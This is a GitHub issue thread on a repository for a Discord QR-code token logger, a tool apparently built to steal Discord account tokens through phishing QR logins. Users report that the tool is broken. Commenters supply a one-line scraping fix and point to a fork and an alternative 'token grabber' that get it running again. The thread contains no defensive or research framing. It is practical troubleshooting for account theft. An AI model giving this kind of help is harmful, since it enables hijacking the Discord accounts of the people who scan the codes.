### ISSUE TITLE
I have the following problem

### ISSUE THREAD

**Issue by OmqClara** [9P9/Discord-QR-Token-Logger#5]
![image](https://user-images.githubusercontent.com/35775733/149378874-1f184924-984e-47ca-8132-c0e61593d4e0.png)

Can i get some help?

**Comment by KAMLEGENDZ** [comment]
> ![image](https://user-images.githubusercontent.com/35775733/149378874-1f184924-984e-47ca-8132-c0e61593d4e0.png)
> 
> Can i get some help?

same issue u have found solution

**Comment by Jacuhb** [comment]
I'm having the same exact issue

**Comment by HeroBaskan** [comment]
Hi,

Try to change line 49 to:

qr_code = soup.find('img')['src']

**Comment by the-cult-of-integral** [comment]
Try [this fork](https://github.com/the-cult-of-integral/Discord-QR-Token-Logger). Your issue is that the QR code class name has changed: this fork uses regular expressions to avoid this becoming an issue.

**Comment by ThatTSGuy** [comment]
Use this instead, it removes the need for web scraping: https://github.com/ThatTSGuy/discord-qr-token-grabber
